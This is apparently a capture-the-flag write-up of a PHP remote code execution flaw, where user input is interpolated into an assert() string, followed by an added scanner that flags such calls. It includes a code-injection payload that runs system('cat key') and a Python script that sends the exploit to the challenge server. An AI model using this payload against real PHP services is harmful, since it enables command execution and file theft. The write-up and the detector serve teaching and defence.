This one was a straightforward PHP RCE.

We got a link to an encryption/decryption system based on PHP. After reading the HTML comments on the homepage, we found that the “API endpoint” had a function dump besides the customCrypto function. This one allowed us to fetch the source code.

The issue was a parameter called DEBUG for the customCrypto function, which allowed us to generate debug messages with assert(). Basically, assert() is the same as eval() but kills the program if the result evaluates to false.

After figuring this out, the attack was simple:

assert("\$message = \"The key is: $xorKey and the plaintext is: \".addslashes(\"$plaintext\");");

The $xorKey is changed from the given input earlier, but the $plaintext is as we send it. For the assertion we need a $xorKey that is valid PHP code, so I simply used ; (encoded as X because the script will subtract 29 from it).

The $plaintext then is simple PHP code: ").system('cat key');//

from requests import post

# ';' shifted up by 29, because the script subtracts 29 from the key
key = chr(ord(';') + 29)
plaintext = "\").system('cat key');//"

# plaintexthex carries the plaintext hex-encoded
payload = 'function=customCrypto&key=%s&plaintexthex=%s&DEBUG=true' % (key, plaintext.encode().hex())
# requests computes Content-Length itself
res = post('http://phpcrypto.2014.ghostintheshellcode.com/crypto.php', data=payload, headers={'Content-Type': 'application/x-www-form-urlencoded'})

print(res.text)

Flag: ThisWasAStupidTestKeyThatBecameARealBoy

by ccmndhd
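
For code review, the pattern behind this bug can be found mechanically: a call to assert() or eval() whose argument is a double-quoted string that PHP interpolates variables into. The scanner below is an added example, not part of the original write-up or the challenge source; the sample PHP is constructed around the one assert() line quoted above, and deriveKey is a hypothetical helper.

```python
import re

# Calls to PHP functions that run a string as code, opening a double-quoted literal.
CALL = re.compile(r'\b(assert|eval)\s*\(\s*"', re.IGNORECASE)
# "$name" or "${name}" as PHP would interpolate it inside double quotes.
VAR = re.compile(r'\$\{?([A-Za-z_]\w*)')

def string_body(src, start):
    """Body of the double-quoted string starting at src[start], honouring backslash escapes."""
    i = start
    while i < len(src) and src[i] != '"':
        i += 2 if src[i] == '\\' else 1
    return src[start:i]

def interpolated_vars(body):
    """Variables PHP substitutes into the string; escaped \\$name and \\" stay literal."""
    names, i = [], 0
    while i < len(body):
        m = VAR.match(body, i)
        if m:
            names.append(m.group(1))
        i = m.end() if m else i + (2 if body[i] == '\\' else 1)
    return names

def scan(php_source):
    """Return (line, function, interpolated variable names) for each risky call."""
    findings = []
    for m in CALL.finditer(php_source):
        names = interpolated_vars(string_body(php_source, m.end()))
        if names:
            line = php_source.count('\n', 0, m.start()) + 1
            findings.append((line, m.group(1).lower(), names))
    return findings

# Constructed sample: only the assert() string on line 5 is taken from the write-up.
SAMPLE = r'''<?php
function customCrypto($key, $plaintext, $debug) {
    $xorKey = deriveKey($key);  // hypothetical helper
    if ($debug) {
        assert("\$message = \"The key is: $xorKey and the plaintext is: \".addslashes(\"$plaintext\");");
    }
    assert(strlen($plaintext) > 0);  // expression argument: not flagged
    eval("\$unused = 1;");           // string without interpolation: not flagged
}
'''

if __name__ == "__main__":
    for line, func, names in scan(SAMPLE):
        print(f"line {line}: {func}() evaluates a string built from ${', $'.join(names)}")
```

The escaped \$message is reported as literal, while $xorKey and $plaintext are reported as interpolated, which is exactly the input that reaches the evaluated string before addslashes() ever runs.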